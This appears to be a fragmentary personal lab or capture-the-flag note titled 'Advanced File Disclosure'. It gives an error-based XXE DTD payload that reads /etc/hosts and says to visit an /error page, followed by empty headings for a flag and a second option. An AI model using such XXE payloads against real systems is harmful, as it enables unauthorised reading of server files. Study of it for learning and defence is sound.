Advanced File Disclosure

For option 1

subl xxe.dtd
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

Access the /error page

For the flag

For option 2

Last updated